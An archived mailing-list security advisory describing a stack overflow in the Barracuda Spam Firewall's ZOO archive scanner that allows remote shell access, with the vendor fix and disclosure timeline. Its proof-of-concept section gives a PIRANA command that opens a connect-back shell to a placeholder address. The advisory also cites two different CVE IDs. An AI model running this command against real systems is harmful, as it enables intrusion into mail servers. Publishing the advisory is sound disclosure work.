Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Barracuda ZOO archiver security bug leads to remote compromi

from [Jean-Sébastien Guay-Leroux] Network Security [Permanent Link]
Subject: [VulnWatch] Barracuda ZOO archiver security bug leads to remote compromise
Date: Mon, 03 Apr 2006 20:30:51 -0400 
Topic:                  Barracuda ZOO archiver security bug leads to
                        remote compromise

Announced:              2006-04-03
Product:                Barracuda Spam Firewall
Vendor:                 http://www.barracudanetworks.com/
Impact:                 Remote shell access
Affected product:       Barracuda with firmware < 3.3.03.022 AND
                        spamdef < 3.0.9388
Credits:                Jean-Sébastien Guay-Leroux
CVE ID:                 CVE-2004-0234


I.      BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


II.     DESCRIPTION:

When building a special ZOO archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted ZOO archive
attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.

For further informations about the details of the bug, you can consult
OSVDB #23460 .


III.    IMPACT

Gain shell access to the remote Barracuda Spam Firewall


IV.     PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the ZOO vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1


V.      SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388,
available March 3rd 2006.

They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.

It is recommended to update to firmware #3.3.03.022 .


VI.     CREDITS

Jean-Sébastien Guay-Leroux who found the original flaw, conducted further
research on the bug and produced exploitation plugin for the PIRANA framework.


VII.    REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0855


VIII.   HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-03 : Problem fixed
2006-04-03 : Advisory disclosed to public
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Barracuda ZOO archiver security bug leads to remote compromise, Jean-Sébastien Guay-Leroux <=
Previous by Date:  [VulnWatch] Barracuda LHA archiver security bug leads to remote compromise, Jean-Sébastien Guay-Leroux
Next by Date:  [Full-disclosure] IMF 2006 - Submission Deadline Extension, Oliver Goebel
Previous by Thread:  [VulnWatch] Barracuda LHA archiver security bug leads to remote compromise, Jean-Sébastien Guay-Leroux
Next by Thread:  [Full-disclosure] IMF 2006 - Submission Deadline Extension, Oliver Goebel
Indexes:  [Date] [Thread] [Top] [All Lists]